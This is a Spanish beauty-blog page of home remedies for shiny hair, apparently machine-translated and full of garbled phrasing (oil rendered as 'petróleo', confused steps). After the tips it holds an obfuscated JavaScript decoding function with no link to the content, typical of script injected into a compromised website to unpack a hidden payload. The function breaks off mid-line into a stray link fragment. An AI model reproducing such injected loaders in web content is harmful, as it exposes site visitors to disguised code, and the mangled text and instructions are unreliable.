Consejos brillante y sedoso Cuidado del Cabello

There are plenty of ways to help keep your hair’s youthful appearance. Here’s what the insiders recommend.

El tratamiento para el cabello y la miel de limón
Mezclar la mitad del jugo de limón en un tazón pequeño de miel, remover bien y aplicarlo a tu cabello. Poco a poco comienzan masajear el cuero cabelludo durante 5 minutos y luego dejar el cabello durante 15 minutos. Ahora enjuague su cabello con agua . Piezas de limón ayuda a limpiar el petróleo y la caspa mientras que la miel hidrata el cabello por lo que es suave y brillante. Utilice este tratamiento para el cabello una vez a la semana para tener un cabello brillante y radiante.

El uso de gel de aloe para el cabello
Extractos de Aloe Vera – están siendo ampliamente utilizados en la industria cosmética . Debido a sus beneficios nutricionales de este gel se puede utilizar para proporcionar la nutrición y el efecto de brillo al cabello . Aplicar el gel de sábila para el cabello y masajear suavemente . Debido a que este gel anti – séptico, que ayuda a tratar las infecciones del cuero cabelludo y picazón del cuero cabelludo . El gel contiene humedad, anti – oxidantes , vitaminas y otros compuestos que benefician el pelo por lo que es sano y fuerte. Esta es una solución eficaz para conseguir un cabello brillante y natural.

Tratamiento capilar profundo para el cabello
Preparar huevos y acondicionador para el cabello miel mezclando cuatro cucharas llenas de miel 2 huevos. Aplique esta pasta sobre el cabello y dejar actuar durante 20 minutos. El uso de champú y agua tibia para lavar el cabello , la proteína en el huevo y la humedad en la miel proporciona brillo y suavidad al cabello.

Plátano como un acondicionador para el cabello
Haga una pasta de plátano y jugo de naranja añadido a la misma . Se utiliza como mascarilla para el pelo y enjuague con agua tibia. También puede agregar miel para el plátano como una alternativa para hacer el pelo liso.

Lave el té verde para un cabello brillante
Para el cabello seco y áspero , utilizar el té caliente agua sin azúcar. Asegúrese de que el agua no estaba caliente. Lavar el cabello con esta agua para hacer té caliente pelo sedoso y brillante .

Vinagre para la iluminación de efecto
Tomar medio vaso de agua medio vinagre y agregar a ella . Lavar el cabello con esta agua una vez por semana . El vinagre es uno de los agentes más prometedores para la fabricación de un cabello brillante y limpia . También puede agregar vinagre al yogur para el acondicionamiento profundo del cabello. Esto le ayudará a pulir tu cabello

Dieta saludable y nutritiva
Dado que el cabello es una proteína llamada queratina de construcción , por lo que deberá incluir una buena cantidad de proteína en la dieta. El pescado, la carne , los huevos son los alimentos con una buena fuente de proteínas en el mismo. También se debe hidratar con se toma vitamina E en los alimentos para tener un cabello suave y sedoso cabello. Plátano , almendras , frutos secos son una buena fuente de vitamina E. Además de esto el consumo de frutas y verduras , leche de consumo, no sólo para el cabello , sino también para la buena salud . Una dieta saludable debe contener también una gran cantidad de agua para mantener el cabello hidratado.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand-quick.html">Facial Massage at Home - Beauty Tips 2014

Deja tu comentario debajo

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.